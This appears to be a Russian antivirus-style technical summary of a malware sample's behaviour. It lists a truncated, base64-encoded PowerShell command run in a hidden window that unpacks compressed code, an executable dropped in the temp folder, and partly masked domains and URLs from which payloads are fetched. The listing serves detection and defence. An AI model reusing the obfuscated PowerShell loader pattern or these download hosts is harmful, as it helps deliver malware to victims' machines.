Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAHMAaABFAGwATABJAGQAWwAxAF0AKwAkAHMASABFAGwATABpAGQAWwAxADMAXQArACcAeAAnACkAKAAgAE4AZQB3AC0AbwBiAGoARQBjAFQAIAAgAEkATwAuAGMAbwBtAHAAcgBFAFMAUwBpAE8ATgAuAEQARQBGAEwAYQB0AEUAcwBUAH...
- %TEMP%\135832.exe
- %TEMP%\135832.exe
- 'av##omp.ru':80
- 'av##omp.ru':443
- 'vi####m-life.net':80
- 'ad####uretext.com':80
- 'k9##m.com':80
- http://av##omp.ru/I5Su4/
- http://vi####m-life.net/09WwlXT/
- http://ad####uretext.com/ifiy27v/
- http://k9##m.com/O4mj/
- 'av##omp.ru':443
- DNS ASK av##omp.ru
- DNS ASK is#####arlama.com.tr
- DNS ASK vi####m-life.net
- DNS ASK ad####uretext.com
- DNS ASK k9##m.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAHMAaABFAGwATABJAGQAWwAxAF0AKwAkAHMASABFAGwATABpAGQAWwAxADMAXQArACcAeAAnACkAKAAgAE4AZQB3AC0AbwBiAGoARQBjAFQAIAAgAEkATwAuAGMAbwBtAHAAcgBFAFMAUwBpAE8ATgAuAEQARQBGAEwAYQB0AEUAcwBUAH...' (со скрытым окном)